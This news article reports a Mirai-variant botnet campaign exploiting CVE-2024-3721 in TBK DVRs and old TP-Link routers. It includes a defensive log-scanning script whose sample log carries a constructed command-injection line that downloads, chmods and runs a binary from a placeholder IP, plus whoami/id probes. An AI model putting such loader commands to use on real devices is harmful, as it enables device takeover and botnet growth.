
Mirai Variant Exploits Flaw in TBK DVRs for Botnet Expansion

What happens when a familiar surveillance appliance and an out‑of‑support router become a battlefield? Security researchers from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 report that threat actors are exploiting vulnerabilities in TBK digital video recorders (DVRs) and end‑of‑life TP‑Link Wi‑Fi routers to install Mirai‑family botnet malware on the compromised devices.

What the researchers found

According to Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, attackers are targeting security flaws in TBK DVR devices and end‑of‑life TP‑Link Wi‑Fi routers to install Mirai‑variant malware. The campaign against TBK DVRs exploits CVE-2024-3721, described in the reporting as a command‑injection vulnerability with a CVSS base score of 6.3 (medium severity).

Background on the exploited flaw

Command injection in an embedded device is attractive to botnet operators because a single crafted request to the device's web interface is enough to run a shell command with the privileges of the web service, which on consumer DVRs is often root. The usual Mirai‑family playbook then fetches a binary built for the device's CPU architecture, marks it executable and launches it. The researchers link active exploitation of CVE-2024-3721 to exactly this kind of deployment on affected TBK DVRs. The reporting also identifies end‑of‑life TP‑Link Wi‑Fi routers as additional targets used by the same or related actors to expand botnet capacity. The medium CVSS rating should not be read as low risk: the base score does not account for devices that are internet‑exposed by design, unpatchable because they are out of support, and deployed in very large numbers.

Why this matters

  • For technologists: The combination of a medium‑severity command‑injection vulnerability and devices that are at or past vendor support creates an attractive path for automated compromise and malicious software installation, the researchers warn.
  • For network operators and users: Compromised consumer and IoT devices repurposed as botnet nodes can be difficult to detect and remove, and end‑of‑life devices present fewer remediation options because vendor updates are no longer available. Mirai‑family payloads have historically run from memory without persistence, so a reboot may clear the infection, but an exposed, unpatched device is typically reinfected quickly, which makes removing it from the internet (or replacing it) the only durable fix.
  • For policymakers and defenders: The incident highlights an intersection of legacy hardware and active exploitation, with implications for risk management of deployed devices and for strategies addressing unsupported equipment in critical or residential networks.
  • For adversaries: The observed activity demonstrates how known vulnerabilities in ubiquitous, low‑cost devices continue to be leveraged to assemble distributed attack infrastructure.
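As an added illustration of the detection point above, the following Python script scans web‑server access logs from a DVR for command‑injection attempts and for the fetch/chmod/execute chain that Mirai‑family bots typically run once they have a shell. It is example code written for this page, not code from the researchers' reports or from any vendor. The sample log lines are constructed, and the path /cgi-bin/status and its parameter names are hypothetical placeholders; the script deliberately does not encode the actual CVE-2024-3721 request.

```python
#!/usr/bin/env python3
"""Flag command-injection and Mirai-style loader attempts in DVR web logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Common Log Format (not real traffic). The path
# /cgi-bin/status and the parameter names are hypothetical placeholders, not
# the request used against CVE-2024-3721.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Jun/2025:08:01:12 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jun/2025:08:01:13 +0000] "GET /cgi-bin/status?dev=cam1&fmt=json HTTP/1.1" 200 88',
    # classic loader chain: fetch an ARM binary, chmod it, run it
    '198.51.100.9 - - [10/Jun/2025:08:02:40 +0000] "GET /cgi-bin/status?dev=cam1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbins%2Farm7%20-O%20%2Ftmp%2Fx%3Bchmod%20777%20%2Ftmp%2Fx%3B%2Ftmp%2Fx HTTP/1.1" 200 88',
    # double-encoded ${whoami}: %2524%257B -> %24%7B -> ${
    '198.51.100.9 - - [10/Jun/2025:08:02:41 +0000] "GET /cgi-bin/status?dev=cam1%2524%257Bwhoami%257D HTTP/1.1" 200 88',
    # backtick substitution probe
    '192.0.2.44 - - [10/Jun/2025:08:03:00 +0000] "GET /cgi-bin/status?dev=%60id%60 HTTP/1.1" 200 88',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Shell metacharacters that turn a parameter value into a second command.
SHELL_META = re.compile(r'[;|&`$]|\n')
# Utilities and paths that Mirai-family loaders habitually chain after an
# injection point: fetch a per-architecture binary, mark it executable, run it.
LOADER_RE = re.compile(r'\b(wget|curl|tftp|busybox|chmod)\b|/tmp/|/bins?/', re.I)


def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_line(line):
    """Return the CLF fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_values(target):
    """Yield (raw, decoded) for each parameter value in the request target.

    Splitting on '&' happens before decoding, so a literal '&' separating
    parameters is not mistaken for an injected one, while an encoded %26
    inside a value still surfaces after decoding.
    """
    raw_query = target.partition('?')[2]
    for pair in (raw_query.split('&') if raw_query else []):
        raw = pair.partition('=')[2]
        yield raw, fully_decode(raw)


def classify(target):
    """Return (severity, reasons) for a request target; severity is None when clean."""
    reasons = []

    def note(reason):
        if reason not in reasons:
            reasons.append(reason)

    for raw, value in query_values(target):
        if SHELL_META.search(value):
            note('shell metacharacter in parameter value')
        if LOADER_RE.search(value):
            note('loader-style fetch/chmod/exec chain')
        if value != unquote_plus(raw):
            note('multi-level percent-encoding')
    if not reasons:
        return None, []
    return ('high' if len(reasons) >= 2 else 'medium'), reasons


def scan(lines):
    """Run classify() over parsed log lines and collect the suspicious ones."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        severity, reasons = classify(rec['target'])
        if severity:
            findings.append({'ip': rec['ip'], 'ts': rec['ts'], 'severity': severity,
                             'reasons': reasons, 'target': rec['target']})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOGS):
        print(f"{f['severity']:6} {f['ip']:15} {'; '.join(f['reasons'])}")
```

Two design choices matter in practice: parameters are split on `&` before percent‑decoding so ordinary multi‑parameter requests do not trip the metacharacter check, and decoding is repeated so a double‑encoded payload is scored the same as a plain one, with the extra encoding layer itself counted as a signal. On a real deployment the same classify() function can be fed from the DVR's own access log or from a reverse proxy in front of it.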

Analysis and implications

The reporting from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 ties a specific, named vulnerability to follow‑on Mirai‑variant activity, drawing a clear line between an identified software weakness and malicious botnet operations. That linkage underscores a familiar dynamic in device security: vulnerabilities with non‑critical CVSS ratings can nevertheless be weaponized at scale when they affect widely deployed or unsupported equipment.

Because the affected categories, DVRs and end‑of‑life home routers, commonly sit at the network edge with a public address or a forwarded port, a successful compromise lets attackers conscript otherwise benign devices into distributed denial‑of‑service (DDoS) campaigns or use them to scan for the next set of victims. The source material reports no downstream impact beyond the deployment of Mirai variants, but the researchers' observations point to continued risk from vulnerable IoT and network devices.

The reporting also implicitly raises questions about lifecycle management for consumer and embedded devices, and the operational challenge of detecting and removing Mirai‑family malware once it has taken hold. Those managing networks that include such devices must weigh continued use against replacement or segmentation. Where replacement is not immediate, the practical checks are to confirm that the DVR or router's management interface is not reachable from the internet (no port forwards, no UPnP mappings), to place the device on its own VLAN with outbound traffic limited to what it actually needs, and to alert on the signs of an active bot: outbound scanning on ports 23 and 2323, unexpected binary downloads over HTTP or TFTP, and high‑volume traffic to a single external host. Defenders and policymakers may view the pattern as evidence of persistent attack vectors that merit coordinated attention.

Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 provide the attribution and technical detail in the source reporting. Their findings focus on exploitation of CVE-2024-3721 in TBK DVRs and the use of end‑of‑life TP‑Link Wi‑Fi routers in Mirai‑variant deployments.

If attackers can convert everyday network and camera hardware into a distributed attack platform, how long will it take for another overlooked device class to become the next botnet backbone?

Original story at The Hacker News